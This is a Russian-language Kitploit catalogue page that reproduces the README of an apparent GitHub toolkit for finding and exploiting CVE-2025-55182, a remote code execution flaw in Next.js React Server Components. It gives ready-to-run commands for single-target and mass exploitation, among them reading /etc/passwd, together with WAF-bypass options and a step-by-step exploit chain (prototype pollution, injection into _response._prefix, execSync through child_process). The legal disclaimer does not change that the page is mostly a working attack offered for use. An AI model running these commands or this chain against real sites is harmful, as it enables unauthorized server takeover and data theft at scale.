Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-55182-NextJS-Scanner-React2Shell-PoC — Автоматизированный набор инструментов для обнаружения и эксплуатации CVE-2025-55182, критической RCE в Next.js React Server Components. Включает многоуровневое снятие отпечатков, обход WAF и массовое сканирование для пентестинга. | Kitploit
Инструменты/GitHubGitHub/exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc
РазведкаСканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийОбход WAFТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
GitHub
exrienz/cve-2025-55182-nextjs-scanner-react2shell-poc

CVE-2025-55182-NextJS-Scanner-React2Shell-PoC

Автоматизированный набор инструментов для обнаружения и эксплуатации CVE-2025-55182, критической RCE в Next.js React Server Components. Включает многоуровневое снятие отпечатков, обход WAF и массовое сканирование для пентестинга.

Репозиторий
59 месяцев назадЕщё не проверено
Поделиться

Инструмент эксплуатации CVE-2025-55182

Комплексный инструмент для исследований безопасности, предназначенный для тестирования уязвимости удалённого выполнения кода в React Server Components Next.js (CVE-2025-55182).

Обзор

Этот набор инструментов предоставляет возможности автоматического обнаружения и эксплуатации уязвимости CVE-2025-55182 — критической RCE-уязвимости, затрагивающей приложения Next.js, использующие React Server Components. Набор состоит из трёх интегрированных компонентов:

  • NextApp.py — интеллектуальный сканер для определения приложений Next.js
  • exploit.sh — гибкий инструмент эксплуатации для одиночных или массовых целей
  • auto_exploit.sh — сквозной оркестратор автоматического сканирования и эксплуатации

Возможности

  • Многоуровневое обнаружение: анализ заголовков, сканирование тела ответа и сбор отпечатков JavaScript
  • Оценка уверенности: интеллектуальная классификация (Высокая/Средняя/Низкая) для минимизации ложных срабатываний
  • Обход WAF: встроенные методы обхода типовых веб-брандмауэров
  • Массовое сканирование: эффективная обработка нескольких целей с подробным отчётом
  • Автоматизированный рабочий процесс: обнаружение и эксплуатация одной командой
  • Детальная отчётность: полные выходные файлы с категоризированными результатами

Требования

Компоненты Python

  • Python 3.x
  • Библиотека requests
root@kitploit:~
pip3 install requests

Компоненты Bash

  • curl
  • openssl
  • Стандартные утилиты Unix (sed, grep, awk, mktemp)

Установка

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-55182-poc-tool.git
cd CVE-2025-55182-poc-tool
chmod +x exploit.sh auto_exploit.sh

Использование

Быстрый старт (рекомендуется)

Самый быстрый способ сканировать и эксплуатировать цели:

root@kitploit:~
# Создайте файл с URL-адресами целей (по одному на строку)
echo "https://example.com" > targets.txt

# Автоматическое сканирование и эксплуатация одной командой
./auto_exploit.sh -i targets.txt -s -c "id"

Только обнаружение

Определение приложений Next.js без эксплуатации:

root@kitploit:~
python3 NextApp.py targets.txt

Выходные файлы:

  • confirmed_nextjs_targets.txt — все обнаруженные приложения Next.js
  • high_confidence_nextjs_targets.txt — только обнаружения с высокой степенью уверенности

Эксплуатация одиночной цели

Тестирование отдельных целей:

root@kitploit:~
# Базовая эксплуатация
./exploit.sh -d https://target.com -c "whoami"

# С обходом WAF
./exploit.sh -d target.com -c "cat /etc/passwd" -w

# Настраиваемый размер обхода WAF
./exploit.sh -d target.com -c "ls -la" --waf-bypass --waf-size 256

# Пропустить проверку SSL
./exploit.sh -d https://target.com -c "id" -k

Массовая эксплуатация

Вариант 1: Единый рабочий процесс (рекомендуется)

root@kitploit:~
./auto_exploit.sh -i targets.txt -s -c "whoami"

Вариант 2: Двухшаговый ручной рабочий процесс

root@kitploit:~
# Шаг 1: Обнаружение приложений Next.js
python3 NextApp.py targets.txt

# Шаг 2: Эксплуатация подтверждённых целей
./auto_exploit.sh -c "id"

Расширенные параметры

root@kitploit:~
# Полное автосканирование с обходом WAF
./auto_exploit.sh -i targets.txt -s -w --waf-size 256 -c "whoami"

# Пользовательские задержки и таймауты
./auto_exploit.sh -i targets.txt -s --delay 5 --timeout 30 -c "id"

# Пропуск проверки SSL в массовом режиме
./auto_exploit.sh -i targets.txt -s -k -c "hostname"

Справочник команд

NextApp.py

root@kitploit:~
python3 NextApp.py <targets_file>

Аргументы:

  • targets_file — текстовый файл с URL-адресами целей (по одному на строку)

exploit.sh

root@kitploit:~
./exploit.sh [ПАРАМЕТРЫ]

Параметры:

auto_exploit.sh

root@kitploit:~
./auto_exploit.sh [ПАРАМЕТРЫ]

Параметры:

Выходные файлы

confirmed_nextjs_targets.txt

Создаётся NextApp.py — содержит все URL-адреса, идентифицированные как приложения Next.js.

high_confidence_nextjs_targets.txt

Создаётся NextApp.py — содержит только обнаружения Next.js с высокой степенью уверенности (оценка достоверности 100+).

exploit_results.txt

Создаётся auto_exploit.sh — полный отчёт об эксплуатации, включая:

  • Уязвимые цели с выводом команды
  • Неуязвимые цели
  • Ошибки и их описание
  • Сводную статистику

Методология обнаружения

Сканер использует несколько методов обнаружения с системой оценки достоверности:

Анализ заголовков (по 50 баллов каждый)

  • Специфические заголовки Next.js: x-nextjs-*, x-vercel-*
  • x-powered-by: Next.js
  • Server: Vercel

Сканирование тела ответа

  • Наличие __NEXT_DATA__ (100 баллов)
  • Шаблон buildId Next.js (50 баллов)
  • Пути ресурсов _next/* (25–75 баллов в зависимости от количества)

Сбор отпечатков JavaScript (60 баллов)

  • __NEXT_DATA__, __NEXT_LOADED_PAGES__
  • middlewareManifest, self.__RSC_MANIFEST

Пороги достоверности:

  • Высокая (100+): несколько сильных индикаторов
  • Средняя (75–99): несколько умеренных индикаторов
  • Низкая (50–74): минимальные подтверждения
  • Ниже 50: отбрасывается как ложное срабатывание

Механизм эксплуатации

Эксплойт использует цепочку загрязнения прототипа в React Server Components Next.js:

  1. Формирование multipart form-data с вложенной полезной нагрузкой
  2. Загрязнение цепочки __proto__ через десериализацию JSON
  3. Внедрение произвольного JavaScript в _response._prefix
  4. Выполнение команд через process.mainModule.require('child_process').execSync()
  5. Извлечение результатов из заголовка X-Action-Redirect
  6. URL-декодирование и форматирование вывода

Методы обхода WAF

Набор инструментов включает встроенные возможности обхода WAF:

  • Внедрение мусорных данных: добавление случайных данных для обхода фильтров, основанных на размере
  • Динамические границы: рандомизированные границы multipart
  • Случайные идентификаторы запросов: уникальные ID для каждого запроса
  • Настраиваемый размер: регулируемый объём мусорных данных (по умолчанию 128 КБ)

Включение с помощью флагов -w или --waf-bypass.

Примеры

Сканирование и эксплуатация веб-приложения

root@kitploit:~
# Создание списка целей
cat > targets.txt << EOF
https://app.example.com
https://dashboard.example.com
https://admin.example.com
EOF

# Запуск единого сканирования
./auto_exploit.sh -i targets.txt -s -c "whoami"

# Просмотр результатов
cat exploit_results.txt

Тестирование одиночной цели с обходом WAF

root@kitploit:~
./exploit.sh -d https://target.com -c "cat /etc/passwd" -w --waf-size 256

Только цели с высокой достоверностью

root@kitploit:~
# Шаг 1: обнаружение и фильтрация
python3 NextApp.py targets.txt

# Шаг 2: эксплуатация только целей с высокой достоверностью
./auto_exploit.sh -i high_confidence_nextjs_targets.txt -c "id"

Юридическое предупреждение

Этот инструмент предназначен исключительно для авторизованного тестирования безопасности и исследовательских целей. Пользователи обязаны:

  • ✅ Получить явное письменное разрешение перед тестированием любых систем
  • ✅ Использовать только в рамках авторизованных пентестов
  • ✅ Соблюдать все применимые законы и нормативные акты
  • ✅ Использовать для оборонительных исследований безопасности и соревнований CTF

Несанкционированный доступ к компьютерным системам незаконен. Авторы не несут ответственности за неправильное использование этого инструмента.

Информация об уязвимости

  • CVE ID: CVE-2025-55182
  • Затрагиваемые компоненты: React Server Components Next.js
  • Тип: Удалённое выполнение кода (RCE)
  • Серьёзность: Критическая

Благодарности

Благодарим исследователей безопасности, обнаруживших и раскрывших эту уязвимость:

  • @zack0x01
  • @infosec_au
  • @pdiscoveryio

Участие в разработке

Приветствуются любые вклады! Пожалуйста:

  1. Сделайте форк репозитория
  2. Создайте ветку для новой функциональности
  3. Зафиксируйте изменения
  4. Отправьте pull request

Поддержка

По вопросам, проблемам или запросам функций, пожалуйста, создайте issue на GitHub.

Лицензия

Этот проект предоставляется для образовательных целей и авторизованного тестирования безопасности. Используйте ответственно и этично.

Скачать инструмент
ПараметрОписаниеПо умолчанию
-d, --domainЦелевой домен/URLhttp://localhost:3000
-f, --fileФайл со списком целей-
-c, --commandКоманда для выполненияid
-w, --waf-bypassВключить обход WAFОтключено
--waf-size SIZEРазмер данных для обхода WAF (КБ)128
--timeout SECONDSТаймаут запроса15
-k, --insecureПропустить проверку SSLОтключено
--user-agent AGENTПользовательский User-AgentMozilla/5.0...
-h, --helpПоказать справку-
ПараметрОписаниеПо умолчанию
-i, --input FILEВходной файл с целямиconfirmed_nextjs_targets.txt
-o, --output FILEВыходной файл с результатамиexploit_results.txt
-c, --command CMDКоманда для выполненияid
-w, --waf-bypassВключить обход WAFОтключено
--waf-size SIZEРазмер обхода WAF (КБ)128
--timeout SECONDSТаймаут запроса15
-k, --insecureПропустить проверку SSLОтключено
--delay SECONDSЗадержка между запросами2
-s, --scanАвтосканирование Next.js сначалаОтключено
-h, --helpПоказать справку-